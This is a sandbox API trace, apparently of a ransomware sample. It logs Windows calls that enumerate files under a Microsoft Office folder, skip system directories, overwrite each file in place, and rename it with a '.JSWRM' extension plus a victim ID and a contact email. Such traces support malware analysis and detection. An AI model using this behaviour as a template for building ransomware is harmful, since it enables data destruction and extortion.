(HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0101.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10_RTL.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10_rtl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.368] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=118299) returned 1 [0101.368] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ce10) returned 0x24d210 [0101.368] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1ce10, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x1ce10, lpOverlapped=0x0) returned 1 [0101.396] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.396] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1ce10, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x1ce10, lpOverlapped=0x0) returned 1 [0101.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.397] CloseHandle (hObject=0x45c) returned 1 [0101.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0101.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0101.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0101.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0101.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0101.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0101.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0101.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0101.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10_RTL.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10_rtl.mp4"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10_RTL.mp4.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10_rtl.mp4.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0101.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0101.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0101.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0101.398] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11541b08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11541b08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115b4243, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7600b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StartMenu_Win7.wmv", cAlternateFileName="STARTM~2.WMV")) returned 1 [0101.398] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2=".") returned 1 [0101.398] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="..") returned 1 [0101.398] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="...") returned 1 [0101.398] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="windows") returned -1 [0101.398] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="recovery") returned 1 [0101.399] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="perflogs") returned 1 [0101.399] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="documents and settings") returned 1 [0101.399] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="$RECYCLE.BIN") returned 1 [0101.399] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="system volume information") returned -1 [0101.399] lstrcmpiW (lpString1="StartMenu_Win7.wmv", lpString2="msocache") returned 1 [0101.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7.wmv", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0101.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7.wmv", cchWideChar=18, lpMultiByteStr=0x240f48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win7.wmv", lpUsedDefaultChar=0x0) returned 18 [0101.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7.wmv", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7.wmv", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win7.wmv", lpUsedDefaultChar=0x0) returned 18 [0101.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0101.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0101.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0101.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7.wmv" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.400] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=483339) returned 1 [0101.400] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0101.400] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0101.413] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.414] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0101.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.414] CloseHandle (hObject=0x45c) returned 1 [0101.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0101.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0101.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0101.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0101.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0101.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0101.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7.wmv" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7.wmv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7.wmv.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7.wmv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0101.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0101.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0101.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0101.416] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11541b08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11541b08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1160070a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc8b14, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StartMenu_Win7_RTL.wmv", cAlternateFileName="STARTM~1.WMV")) returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2=".") returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="..") returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="...") returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="windows") returned -1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="recovery") returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="perflogs") returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="documents and settings") returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="$RECYCLE.BIN") returned 1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="system volume information") returned -1 [0101.416] lstrcmpiW (lpString1="StartMenu_Win7_RTL.wmv", lpString2="msocache") returned 1 [0101.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7_RTL.wmv", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7_RTL.wmv", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win7_RTL.wmv", lpUsedDefaultChar=0x0) returned 22 [0101.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7_RTL.wmv", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win7_RTL.wmv", cchWideChar=22, lpMultiByteStr=0x240f20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win7_RTL.wmv", lpUsedDefaultChar=0x0) returned 22 [0101.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0101.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0101.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7_RTL.wmv" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7_rtl.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.417] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=822036) returned 1 [0101.417] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0101.417] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0101.430] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.430] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0101.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.431] CloseHandle (hObject=0x45c) returned 1 [0101.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0101.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0101.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0101.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0101.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0101.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0101.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0101.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0101.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.431] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7_RTL.wmv" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7_rtl.wmv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7_RTL.wmv.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7_rtl.wmv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0101.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0101.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0101.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.432] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x115da4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19768, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StartMenu_Win8.mp4", cAlternateFileName="STARTM~4.MP4")) returned 1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2=".") returned 1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="..") returned 1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="...") returned 1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="windows") returned -1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="recovery") returned 1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="perflogs") returned 1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="documents and settings") returned 1 [0101.432] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="$RECYCLE.BIN") returned 1 [0101.433] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="system volume information") returned -1 [0101.433] lstrcmpiW (lpString1="StartMenu_Win8.mp4", lpString2="msocache") returned 1 [0101.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8.mp4", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0101.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8.mp4", cchWideChar=18, lpMultiByteStr=0x2412e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win8.mp4", lpUsedDefaultChar=0x0) returned 18 [0101.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8.mp4", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0101.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8.mp4", cchWideChar=18, lpMultiByteStr=0x241380, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win8.mp4", lpUsedDefaultChar=0x0) returned 18 [0101.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0101.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0101.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 